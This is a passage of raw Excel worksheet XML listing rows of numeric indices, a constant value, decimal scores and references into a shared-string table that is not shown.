      <c r="A3750" s="1">
        <v>3748</v>
      </c>
      <c r="B3750">
        <v>7296</v>
      </c>
      <c r="C3750">
        <v>7296</v>
      </c>
      <c r="D3750">
        <v>2</v>
      </c>
      <c r="E3750">
        <v>0.73589998483657837</v>
      </c>
      <c r="F3750" t="s">
        <v>5592</v>
      </c>
      <c r="G3750" t="s">
        <v>7417</v>
      </c>
      <c r="H3750" t="s">
        <v>7418</v>
      </c>
    </row>
    <row r="3751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3751" s="1">
        <v>3749</v>
      </c>
      <c r="B3751">
        <v>1374</v>
      </c>
      <c r="C3751">
        <v>1374</v>
      </c>
      <c r="D3751">
        <v>2</v>
      </c>
      <c r="E3751">
        <v>0.60170000791549683</v>
      </c>
      <c r="F3751" t="s">
        <v>5592</v>
      </c>
      <c r="G3751" t="s">
        <v>7419</v>
      </c>
      <c r="H3751" t="s">
        <v>7420</v>
      </c>
    </row>
    <row r="3752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3752" s="1">
        <v>3750</v>
      </c>
      <c r="B3752">
        <v>1378</v>
      </c>
      <c r="C3752">
        <v>1378</v>
      </c>
      <c r="D3752">
        <v>2</v>
      </c>
      <c r="E3752">
        <v>0.74659997224807739</v>
      </c>
      <c r="F3752" t="s">
        <v>5592</v>
      </c>
      <c r="G3752" t="s">
        <v>7421</v>
      </c>
      <c r="H3752" t="s">
        <v>7422</v>
      </c>
    </row>
    <row r="3753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3753" s="1">
        <v>3751</v>
      </c>
      <c r="B3753">
        <v>1381</v>
      </c>
      <c r="C3753">
        <v>1381</v>
      </c>
      <c r="D3753">
        <v>2</v>
      </c>
      <c r="E3753">
        <v>0.46360000967979431</v>
      </c>
      <c r="F3753" t="s">
        <v>5592</v>
      </c>
      <c r="G3753" t="s">
        <v>7423</v>
      </c>
      <c r="H3753" t="s">
        <v>7424</v>
      </c>
    </row>
    <row r="3754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3754" s="1">
        <v>3752</v>
      </c>
      <c r="B3754">
        <v>7289</v>
      </c>
      <c r="C3754">
        <v>7289</v>
      </c>
      <c r="D3754">
        <v>2</v>
      </c>
      <c r="E3754">
        <v>0.91420000791549683</v>
      </c>
      <c r="F3754" t="s">
        <v>5592</v>
      </c>
      <c r="G3754" t="s">
        <v>7425</v>
      </c>
      <c r="H3754" t="s">
        <v>7426</v>
      </c>
    </row>
    <row r="3755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3755" s="1">
        <v>3753</v>
      </c>
      <c r="B3755">
        <v>7285</v>
      </c>
      <c r="C3755">
        <v>7285</v>
      </c>
      <c r="D3755">
        <v>2</v>
      </c>
      <c r="E3755">
        <v>0.95550000667572021</v>
      </c>
      <c r="F3755" t="s">
        <v>5592</v>
      </c>
      <c r="G3755" t="s">
        <v>7427</v>
      </c>
      <c r="H3755" t="s">
        <v>7428</v>
      </c>
    </row>
    <row r="3756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3756" s="1">
        <v>3754</v>
      </c>
      <c r="B3756">
        <v>1398</v>
      </c>
      <c r="C3756">
        <v>1398</v>
      </c>
      <c r="D3756">
        <v>2</v>
      </c>
      <c r="E3756">
        <v>0.98009997606277466</v>
      </c>
      <c r="F3756" t="s">
        <v>5592</v>
      </c>
      <c r="G3756" t="s">
        <v>7429</v>
      </c>
      <c r="H3756" t="s">
        <v>7430</v>
      </c>
    </row>
    <row r="3757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3757" s="1">
        <v>3755</v>
      </c>
      <c r="B3757">
        <v>1399</v>
      </c>
      <c r="C3757">
        <v>1399</v>
      </c>
      <c r="D3757">
        <v>2</v>
      </c>
      <c r="E3757">
        <v>0.77979999780654907</v>
      </c>
      <c r="F3757" t="s">
        <v>5592</v>
      </c>
      <c r="G3757" t="s">
        <v>7431</v>
      </c>
      <c r="H3757" t="s">
        <v>7432</v>
      </c>
    </row>
    <row r="3758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3758" s="1">
        <v>3756</v>
      </c>
      <c r="B3758">
        <v>7284</v>
      </c>
      <c r="C3758">
        <v>7284</v>
      </c>
      <c r="D3758">
        <v>2</v>
      </c>
      <c r="E3758">
        <v>0.99210000038146973</v>
      </c>
      <c r="F3758" t="s">
        <v>5592</v>
      </c>
      <c r="G3758" t="s">
        <v>7433</v>
      </c>
      <c r="H3758" t="s">
        <v>7434</v>
      </c>
    </row>
    <row r="3759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3759" s="1">
        <v>3757</v>
      </c>
      <c r="B3759">
        <v>1404</v>
      </c>
      <c r="C3759">
        <v>1404</v>
      </c>
      <c r="D3759">
        <v>2</v>
      </c>
      <c r="E3759">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3759" t="s">
        <v>5592</v>
      </c>
      <c r="G3759" t="s">
        <v>7435</v>
      </c>
      <c r="H3759" t="s">
        <v>7436</v>
      </c>
    </row>
    <row r="3760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3760" s="1">
        <v>3758</v>
      </c>
      <c r="B3760">
        <v>1406</v>
      </c>
      <c r="C3760">
        <v>1406</v>
      </c>
      <c r="D3760">
        <v>2</v>
      </c>
      <c r="E3760">
        <v>0.90460002422332764</v>
      </c>
      <c r="F3760" t="s">
        <v>5592</v>
      </c>
      <c r="G3760" t="s">
        <v>7437</v>
      </c>
      <c r="H3760" t="s">
        <v>7438</v>
      </c>
    </row>
    <row r="3761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3761" s="1">
        <v>3759</v>
      </c>
      <c r="B3761">
        <v>1408</v>
      </c>
      <c r="C3761">
        <v>1408</v>
      </c>
      <c r="D3761">
        <v>2</v>
      </c>
      <c r="E3761">
        <v>0.46180000901222229</v>
      </c>
      <c r="F3761" t="s">
        <v>5592</v>
      </c>
      <c r="G3761" t="s">
        <v>7439</v>
      </c>
      <c r="H3761" t="s">
        <v>7396</v>
      </c>
    </row>
    <row r="3762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3762" s="1">
        <v>3760</v>
      </c>
      <c r="B3762">
        <v>1376</v>
      </c>
      <c r="C3762">
        <v>1376</v>
      </c>
      <c r="D3762">
        <v>2</v>
      </c>
      <c r="E3762">
        <v>0.51380002498626709</v>
      </c>
      <c r="F3762" t="s">
        <v>5592</v>
      </c>
      <c r="G3762" t="s">
        <v>7440</v>
      </c>
      <c r="H3762" t="s">
        <v>7441</v>
      </c>
    </row>
    <row r="3763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3763" s="1">
        <v>3761</v>
      </c>
      <c r="B3763">
        <v>1234</v>
      </c>
      <c r="C3763">
        <v>1234</v>
      </c>
      <c r="D3763">
        <v>2</v>
      </c>
      <c r="E3763">
        <v>0.40400001406669622</v>
      </c>
      <c r="F3763" t="s">
        <v>5592</v>
      </c>
      <c r="G3763" t="s">
        <v>7442</v>
      </c>
      <c r="H3763" t="s">
        <v>7443</v>
      </c>
    </row>
    <row r="3764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3764" s="1">
        <v>3762</v>
      </c>
      <c r="B3764">
        <v>1233</v>
      </c>
      <c r="C3764">
        <v>1233</v>
      </c>
      <c r="D3764">
        <v>2</v>
      </c>
      <c r="E3764">
        <v>0.62319999933242798</v>
      </c>
      <c r="F3764" t="s">
        <v>5592</v>
      </c>
      <c r="G3764" t="s">
        <v>7444</v>
      </c>
      <c r="H3764" t="s">
        <v>7445</v>
      </c>
    </row>
    <row r="3765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3765" s="1">
        <v>3763</v>
      </c>
      <c r="B3765">
        <v>1231</v>
      </c>
      <c r="C3765">
        <v>1231</v>
      </c>
      <c r="D3765">
        <v>2</v>
      </c>
      <c r="E3765">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3765" t="s">
        <v>5592</v>
      </c>
      <c r="G3765" t="s">
        <v>7446</v>
      </c>
      <c r="H3765" t="s">
        <v>7447</v>
      </c>
    </row>
    <row r="3766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3766" s="1">
        <v>3764</v>
      </c>
      <c r="B3766">
        <v>1044</v>
      </c>
      <c r="C3766">
        <v>1044</v>
      </c>
      <c r="D3766">
        <v>2</v>
      </c>
      <c r="E3766">
        <v>0.69040000438690186</v>
      </c>
      <c r="F3766" t="s">
        <v>5592</v>
      </c>
      <c r="G3766" t="s">
        <v>7448</v>
      </c>
      <c r="H3766" t="s">
        <v>7449</v>
      </c>
    </row>
    <row r="3767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3767" s="1">
        <v>3765</v>
      </c>
      <c r="B3767">
        <v>1045</v>
      </c>
      <c r="C3767">
        <v>1045</v>
      </c>
      <c r="D3767">
        <v>2</v>
      </c>
      <c r="E3767">
        <v>0.71670001745223999</v>
      </c>
      <c r="F3767" t="s">
        <v>5592</v>
      </c>
      <c r="G3767" t="s">
        <v>7450</v>
      </c>
      <c r="H3767" t="s">
        <v>7451</v>
      </c>
    </row>
    <row r="3768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3768" s="1">
        <v>3766</v>
      </c>
      <c r="B3768">
        <v>7434</v>
      </c>
      <c r="C3768">
        <v>7434</v>
      </c>
      <c r="D3768">
        <v>2</v>
      </c>
      <c r="E3768">
        <v>0.99629998207092285</v>
      </c>
      <c r="F3768" t="s">
        <v>5592</v>
      </c>
      <c r="G3768" t="s">
        <v>7452</v>
      </c>
      <c r="H3768" t="s">
        <v>7453</v>
      </c>
    </row>
    <row r="3769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3769" s="1">
        <v>3767</v>
      </c>
      <c r="B3769">
        <v>7433</v>
      </c>
      <c r="C3769">
        <v>7433</v>
      </c>
      <c r="D3769">
        <v>2</v>
      </c>
      <c r="E3769">
        <v>0.99650001525878906</v>
      </c>
      <c r="F3769" t="s">
        <v>5592</v>
      </c>
      <c r="G3769" t="s">
        <v>7454</v>
      </c>
      <c r="H3769" t="s">
        <v>7455</v>
      </c>
    </row>
    <row r="3770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3770" s="1">
        <v>3768</v>
      </c>
      <c r="B3770">
        <v>7432</v>
      </c>
      <c r="C3770">
        <v>7432</v>
      </c>
      <c r="D3770">
        <v>2</v>
      </c>
      <c r="E3770">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3770" t="s">
        <v>5592</v>
      </c>
      <c r="G3770" t="s">
        <v>7456</v>
      </c>
      <c r="H3770" t="s">
        <v>7457</v>
      </c>
    </row>
    <row r="3771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3771" s="1">
        <v>3769</v>
      </c>
      <c r="B3771">
        <v>7431</v>
      </c>
      <c r="C3771">
        <v>7431</v>
      </c>
      <c r="D3771">
        <v>2</v>
      </c>
      <c r="E3771">
        <v>0.99519997835159302</v>
      </c>
      <c r="F3771" t="s">
        <v>5592</v>
      </c>
      <c r="G3771" t="s">
        <v>7458</v>
      </c>
      <c r="H3771" t="s">
        <v>7459</v>
      </c>
    </row>
    <row r="3772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3772" s="1">
        <v>3770</v>
      </c>
      <c r="B3772">
        <v>7429</v>
      </c>
      <c r="C3772">
        <v>7429</v>
      </c>
      <c r="D3772">
        <v>2</v>
      </c>
      <c r="E3772">
        <v>0.99500000476837158</v>
      </c>
      <c r="F3772" t="s">
        <v>5592</v>
      </c>
      <c r="G3772" t="s">
        <v>7460</v>
      </c>
      <c r="H3772" t="s">
        <v>7461</v>
      </c>
    </row>
    <row r="3773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3773" s="1">
        <v>3771</v>
      </c>
      <c r="B3773">
        <v>7428</v>
      </c>
      <c r="C3773">
        <v>7428</v>
      </c>
      <c r="D3773">
        <v>2</v>
      </c>
      <c r="E3773">
        <v>0.99610000848770142</v>
      </c>
      <c r="F3773" t="s">
        <v>5592</v>
      </c>
      <c r="G3773" t="s">
        <v>7462</v>
      </c>
      <c r="H3773" t="s">
        <v>7463</v>
      </c>
    </row>
    <row r="3774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3774" s="1">
        <v>3772</v>
      </c>
      <c r="B3774">
        <v>7427</v>
      </c>
      <c r="C3774">
        <v>7427</v>
      </c>
      <c r="D3774">
        <v>2</v>
      </c>
      <c r="E3774">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3774" t="s">
        <v>5592</v>
      </c>
      <c r="G3774" t="s">
        <v>7464</v>
      </c>
      <c r="H3774" t="s">
        <v>7465</v>
      </c>
    </row>
    <row r="3775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3775" s="1">
        <v>3773</v>
      </c>
      <c r="B3775">
        <v>7425</v>
      </c>
      <c r="C3775">
        <v>7425</v>
      </c>
      <c r="D3775">
        <v>2</v>
      </c>
      <c r="E3775">
        <v>0.98019999265670776</v>
      </c>
      <c r="F3775" t="s">
        <v>5592</v>
      </c>
      <c r="G3775" t="s">
        <v>7466</v>
      </c>
      <c r="H3775" t="s">
        <v>7467</v>
      </c>
    </row>
    <row r="3776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3776" s="1">
        <v>3774</v>
      </c>
      <c r="B3776">
        <v>7424</v>
      </c>
      <c r="C3776">
        <v>7424</v>
      </c>
      <c r="D3776">
        <v>2</v>
      </c>
      <c r="E3776">
        <v>0.96740001440048218</v>
      </c>
      <c r="F3776" t="s">
        <v>5592</v>
      </c>
      <c r="G3776" t="s">
        <v>7468</v>
      </c>
      <c r="H3776" t="s">
        <v>7469</v>
      </c>
    </row>
    <row r="3777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3777" s="1">
        <v>3775</v>
      </c>
      <c r="B3777">
        <v>7423</v>
      </c>
      <c r="C3777">
        <v>7423</v>
      </c>
      <c r="D3777">
        <v>2</v>
      </c>
      <c r="E3777">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3777" t="s">
        <v>5592</v>
      </c>
      <c r="G3777" t="s">
        <v>7470</v>
      </c>
      <c r="H3777" t="s">
        <v>7471</v>
      </c>
    </row>
    <row r="3778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3778" s="1">
        <v>3776</v>
      </c>
      <c r="B3778">
        <v>7422</v>
      </c>
      <c r="C3778">
        <v>7422</v>
      </c>
      <c r="D3778">
        <v>2</v>
      </c>
      <c r="E3778">
        <v>0.99739998579025269</v>
      </c>
      <c r="F3778" t="s">
        <v>5592</v>
      </c>
      <c r="G3778" t="s">
        <v>7472</v>
      </c>
      <c r="H3778" t="s">
        <v>7473</v>
      </c>
    </row>
    <row r="3779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3779" s="1">
        <v>3777</v>
      </c>
      <c r="B3779">
        <v>1082</v>
      </c>
      <c r="C3779">
        <v>1082</v>
      </c>
      <c r="D3779">
        <v>2</v>
      </c>
      <c r="E3779">
        <v>0.78640002012252808</v>
      </c>
      <c r="F3779" t="s">
        <v>5592</v>
      </c>
      <c r="G3779" t="s">
        <v>7474</v>
      </c>
      <c r="H3779" t="s">
        <v>7475</v>
      </c>
    </row>
    <row r="3780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3780" s="1">
        <v>3778</v>
      </c>
      <c r="B3780">
        <v>1083</v>
      </c>
      <c r="C3780">
        <v>1083</v>
      </c>
      <c r="D3780">
        <v>2</v>
      </c>
      <c r="E3780">
        <v>0.89709997177124023</v>
      </c>
      <c r="F3780" t="s">
        <v>5592</v>
      </c>
      <c r="G3780" t="s">
        <v>7476</v>
      </c>
      <c r="H3780" t="s">
        <v>7477</v>
      </c>
    </row>
    <row r="3781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3781" s="1">
        <v>3779</v>
      </c>
      <c r="B3781">
        <v>7420</v>
      </c>
      <c r="C3781">
        <v>7420</v>
      </c>
      <c r="D3781">
        <v>2</v>
      </c>
      <c r="E3781">
        <v>0.91390001773834229</v>
      </c>
      <c r="F3781" t="s">
        <v>5592</v>
      </c>
      <c r="G3781" t="s">
        <v>7478</v>
      </c>
      <c r="H3781" t="s">
        <v>7479</v>
      </c>
    </row>
    <row r="3782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3782" s="1">
        <v>3780</v>
      </c>
      <c r="B3782">
        <v>7419</v>
      </c>
      <c r="C3782">
        <v>7419</v>
      </c>
      <c r="D3782">
        <v>2</v>
      </c>
      <c r="E3782">
        <v>0.62910002470016479</v>
      </c>
      <c r="F3782" t="s">
        <v>5592</v>
      </c>
      <c r="G3782" t="s">
        <v>7480</v>
      </c>
      <c r="H3782" t="s">
        <v>7481</v>
      </c>
    </row>
    <row r="3783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3783" s="1">
        <v>3781</v>
      </c>
      <c r="B3783">
        <v>7416</v>
      </c>
      <c r="C3783">
        <v>7416</v>
      </c>
      <c r="D3783">
        <v>2</v>
      </c>
      <c r="E3783">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3783" t="s">
        <v>5592</v>
      </c>
      <c r="G3783" t="s">
        <v>7482</v>
      </c>
      <c r="H3783" t="s">
        <v>7483</v>
      </c>
    </row>
    <row r="3784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3784" s="1">
        <v>3782</v>
      </c>
      <c r="B3784">
        <v>7415</v>
      </c>
      <c r="C3784">
        <v>7415</v>
      </c>
      <c r="D3784">
        <v>2</v>
      </c>
      <c r="E3784">
        <v>0.52590000629425049</v>
      </c>
      <c r="F3784" t="s">
        <v>5592</v>
      </c>
      <c r="G3784" t="s">
        <v>7484</v>
      </c>
      <c r="H3784" t="s">
        <v>7485</v>
      </c>
    </row>
    <row r="3785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3785" s="1">
        <v>3783</v>
      </c>
      <c r="B3785">
        <v>7414</v>
      </c>
      <c r="C3785">
        <v>7414</v>
      </c>
      <c r="D3785">
        <v>2</v>
      </c>
      <c r="E3785">
        <v>0.98009997606277466</v>
      </c>
      <c r="F3785" t="s">
        <v>5592</v>
      </c>
      <c r="G3785" t="s">
        <v>7486</v>
      </c>
      <c r="H3785" t="s">
        <v>7487</v>
      </c>
    </row>
    <row r="3786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3786" s="1">
        <v>3784</v>
      </c>
      <c r="B3786">
        <v>7413</v>
      </c>
      <c r="C3786">
        <v>7413</v>
      </c>
      <c r="D3786">
        <v>2</v>
      </c>
      <c r="E3786">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3786" t="s">
        <v>5592</v>
      </c>
      <c r="G3786" t="s">
        <v>7488</v>
      </c>
      <c r="H3786" t="s">
        <v>7489</v>
      </c>
    </row>
    <row r="3787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3787" s="1">
        <v>3785</v>
      </c>
      <c r="B3787">
        <v>7435</v>
      </c>
      <c r="C3787">
        <v>7435</v>
      </c>
      <c r="D3787">
        <v>2</v>
      </c>
      <c r="E3787">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3787" t="s">
        <v>5592</v>
      </c>
      <c r="G3787" t="s">
        <v>7490</v>
      </c>
      <c r="H3787" t="s">
        <v>7491</v>
      </c>
    </row>
    <row r="3788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3788" s="1">
        <v>3786</v>
      </c>
      <c r="B3788">
        <v>7436</v>
      </c>
      <c r="C3788">
        <v>7436</v>
      </c>
      <c r="D3788">
        <v>2</v>
      </c>
      <c r="E3788">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3788" t="s">
        <v>5592</v>
      </c>
      <c r="G3788" t="s">
        <v>7492</v>
      </c>
      <c r="H3788" t="s">
        <v>7493</v>
      </c>
    </row>
    <row r="3789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3789" s="1">
        <v>3787</v>
      </c>
      <c r="B3789">
        <v>7437</v>
      </c>
      <c r="C3789">
        <v>7437</v>
      </c>
      <c r="D3789">
        <v>2</v>
      </c>
      <c r="E3789">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3789" t="s">
        <v>5592</v>
      </c>
      <c r="G3789" t="s">
        <v>7494</v>
      </c>
      <c r="H3789" t="s">
        <v>7495</v>
      </c>
    </row>
    <row r="3790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3790" s="1">
        <v>3788</v>
      </c>
      <c r="B3790">
        <v>7438</v>
      </c>
      <c r="C3790">
        <v>7438</v>
      </c>
      <c r="D3790">
        <v>2</v>
      </c>
      <c r="E3790">
        <v>0.99409997463226318</v>
      </c>
      <c r="F3790" t="s">
        <v>5592</v>
      </c>
      <c r="G3790" t="s">
        <v>7496</v>
      </c>
      <c r="H3790" t="s">
        <v>7497</v>
      </c>
    </row>
    <row r="3791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3791" s="1">
        <v>3789</v>
      </c>
      <c r="B3791">
        <v>991</v>
      </c>
      <c r="C3791">
        <v>991</v>
      </c>
      <c r="D3791">
        <v>2</v>
      </c>
      <c r="E3791">
        <v>0.81599998474121094</v>
      </c>
      <c r="F3791" t="s">
        <v>5592</v>
      </c>
      <c r="G3791" t="s">
        <v>7498</v>
      </c>
      <c r="H3791" t="s">
        <v>7499</v>
      </c>
    </row>
    <row r="3792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3792" s="1">
        <v>3790</v>
      </c>
      <c r="B3792">
        <v>992</v>
      </c>
      <c r="C3792">
        <v>992</v>
      </c>
      <c r="D3792">
        <v>2</v>
      </c>
      <c r="E3792">
        <v>0.8246999979019165</v>
      </c>
      <c r="F3792" t="s">
        <v>5592</v>
      </c>
      <c r="G3792" t="s">
        <v>7500</v>
      </c>
      <c r="H3792" t="s">
        <v>7501</v>
      </c>
    </row>
    <row r="3793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3793" s="1">
        <v>3791</v>
      </c>
      <c r="B3793">
        <v>7463</v>
      </c>
      <c r="C3793">
        <v>7463</v>
      </c>
      <c r="D3793">
        <v>2</v>
      </c>
      <c r="E3793">
        <v>0.99870002269744873</v>
      </c>
      <c r="F3793" t="s">
        <v>5592</v>
      </c>
      <c r="G3793" t="s">
        <v>7502</v>
      </c>
      <c r="H3793" t="s">
        <v>7503</v>
      </c>
    </row>
    <row r="3794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3794" s="1">
        <v>3792</v>
      </c>
      <c r="B3794">
        <v>994</v>
      </c>
      <c r="C3794">
        <v>994</v>
      </c>
      <c r="D3794">
        <v>2</v>
      </c>
      <c r="E3794">
        <v>0.99360001087188721</v>
      </c>
      <c r="F3794" t="s">
        <v>5592</v>
      </c>
      <c r="G3794" t="s">
        <v>7504</v>
      </c>
      <c r="H3794" t="s">
        <v>7505</v>
      </c>
    </row>
    <row r="3795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3795" s="1">
        <v>3793</v>
      </c>
      <c r="B3795">
        <v>995</v>
      </c>
      <c r="C3795">
        <v>995</v>
      </c>
      <c r="D3795">
        <v>2</v>
      </c>
      <c r="E3795">
        <v>0.76969999074935913</v>
      </c>
      <c r="F3795" t="s">
        <v>5592</v>
      </c>
      <c r="G3795" t="s">
        <v>7506</v>
      </c>
      <c r="H3795" t="s">
        <v>7507</v>
      </c>
    </row>
    <row r="3796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3796" s="1">
        <v>3794</v>
      </c>
      <c r="B3796">
        <v>998</v>
      </c>
      <c r="C3796">
        <v>998</v>
      </c>
      <c r="D3796">
        <v>2</v>
      </c>
      <c r="E3796">
        <v>0.76349997520446777</v>
      </c>
      <c r="F3796" t="s">
        <v>5592</v>
      </c>
      <c r="G3796" t="s">
        <v>7508</v>
      </c>
      <c r="H3796" t="s">
        <v>7509</v>
      </c>
    </row>
    <row r="3797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3797" s="1">
        <v>3795</v>
      </c>
      <c r="B3797">
        <v>999</v>
      </c>
      <c r="C3797">
        <v>999</v>
      </c>
      <c r="D3797">
        <v>2</v>
      </c>
      <c r="E3797">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3797" t="s">
        <v>5592</v>
      </c>
      <c r="G3797" t="s">
        <v>7510</v>
      </c>
      <c r="H3797" t="s">
        <v>7511</v>
      </c>
    </row>
    <row r="3798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3798" s="1">
        <v>3796</v>
      </c>
      <c r="B3798">
        <v>1000</v>
      </c>
      <c r="C3798">
        <v>1000</v>
      </c>
      <c r="D3798">
        <v>2</v>
      </c>
      <c r="E3798">
        <v>0.69290000200271606</v>
      </c>
      <c r="F3798" t="s">
        <v>5592</v>
      </c>
      <c r="G3798" t="s">
        <v>7512</v>
      </c>
      <c r="H3798" t="s">
        <v>7513</v>
      </c>
    </row>
    <row r="3799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3799" s="1">
        <v>3797</v>
      </c>
      <c r="B3799">
        <v>1003</v>
      </c>
      <c r="C3799">
        <v>1003</v>
      </c>
      <c r="D3799">
        <v>2</v>
      </c>
      <c r="E3799">
        <v>0.73669999837875366</v>
      </c>
      <c r="F3799" t="s">
        <v>5592</v>
      </c>
      <c r="G3799" t="s">
        <v>7514</v>
      </c>
      <c r="H3799" t="s">
        <v>7515</v>
      </c>
    </row>
    <row r="3800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3800" s="1">
        <v>3798</v>
      </c>
      <c r="B3800">
        <v>7455</v>
      </c>
      <c r="C3800">
        <v>7455</v>
      </c>
      <c r="D3800">
        <v>2</v>
      </c>
      <c r="E3800">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3800" t="s">
        <v>5592</v>
      </c>
      <c r="G3800" t="s">
        <v>7516</v>
      </c>
      <c r="H3800" t="s">
        <v>7517</v>
      </c>
    </row>
    <row r="3801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3801" s="1">
        <v>3799</v>
      </c>
      <c r="B3801">
        <v>7412</v>
      </c>
      <c r="C3801">
        <v>7412</v>
      </c>
      <c r="D3801">
        <v>2</v>
      </c>
      <c r="E3801">
        <v>0.99690002202987671</v>
      </c>
      <c r="F3801" t="s">
        <v>5592</v>
      </c>
      <c r="G3801" t="s">
        <v>7518</v>
      </c>
      <c r="H3801" t="s">
        <v>7519</v>
      </c>
    </row>
    <row r="3802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3802" s="1">
        <v>3800</v>
      </c>
      <c r="B3802">
        <v>1010</v>
      </c>
      <c r="C3802">
        <v>1010</v>
      </c>
      <c r="D3802">
        <v>2</v>
      </c>
      <c r="E3802">
        <v>0.42070001363754272</v>
      </c>
      <c r="F3802" t="s">
        <v>5592</v>
      </c>
      <c r="G3802" t="s">
        <v>7520</v>
      </c>
      <c r="H3802" t="s">
        <v>7521</v>
      </c>
    </row>
    <row r="3803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3803" s="1">
        <v>3801</v>
      </c>
      <c r="B3803">
        <v>1019</v>
      </c>
      <c r="C3803">
        <v>1019</v>
      </c>
      <c r="D3803">
        <v>2</v>
      </c>
      <c r="E3803">
        <v>0.89300000667572021</v>
      </c>
      <c r="F3803" t="s">
        <v>5592</v>
      </c>
      <c r="G3803" t="s">
        <v>7522</v>
      </c>
      <c r="H3803" t="s">
        <v>7523</v>
      </c>
    </row>
    <row r="3804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3804" s="1">
        <v>3802</v>
      </c>
      <c r="B3804">
        <v>7448</v>
      </c>
      <c r="C3804">
        <v>7448</v>
      </c>
      <c r="D3804">
        <v>2</v>
      </c>
      <c r="E3804">
        <v>0.60049998760223389</v>
      </c>
      <c r="F3804" t="s">
        <v>5592</v>
      </c>
      <c r="G3804" t="s">
        <v>7524</v>
      </c>
      <c r="H3804" t="s">
        <v>7525</v>
      </c>
    </row>
    <row r="3805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3805" s="1">
        <v>3803</v>
      </c>
      <c r="B3805">
        <v>1022</v>
      </c>
      <c r="C3805">
        <v>1022</v>
      </c>
      <c r="D3805">
        <v>2</v>
      </c>
      <c r="E3805">
        <v>0.54530000686645508</v>
      </c>
      <c r="F3805" t="s">
        <v>5592</v>
      </c>
      <c r="G3805" t="s">
        <v>7526</v>
      </c>
      <c r="H3805" t="s">
        <v>7527</v>
      </c>
    </row>
    <row r="3806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3806" s="1">
        <v>3804</v>
      </c>
      <c r="B3806">
        <v>7447</v>
      </c>
      <c r="C3806">
        <v>7447</v>
      </c>
      <c r="D3806">
        <v>2</v>
      </c>
      <c r="E3806">
        <v>0.99309998750686646</v>
      </c>
      <c r="F3806" t="s">
        <v>5592</v>
      </c>
      <c r="G3806" t="s">
        <v>7528</v>
      </c>
      <c r="H3806" t="s">
        <v>7529</v>
      </c>
    </row>
    <row r="3807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3807" s="1">
        <v>3805</v>
      </c>
      <c r="B3807">
        <v>1029</v>
      </c>
      <c r="C3807">
        <v>1029</v>
      </c>
      <c r="D3807">
        <v>2</v>
      </c>
      <c r="E3807">
        <v>0.98619997501373291</v>
      </c>
      <c r="F3807" t="s">
        <v>5592</v>
      </c>
      <c r="G3807" t="s">
        <v>7530</v>
      </c>
      <c r="H3807" t="s">
        <v>7531</v>
      </c>
    </row>
    <row r="3808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3808" s="1">
        <v>3806</v>
      </c>
      <c r="B3808">
        <v>7445</v>
      </c>
      <c r="C3808">
        <v>7445</v>
      </c>
      <c r="D3808">
        <v>2</v>
      </c>
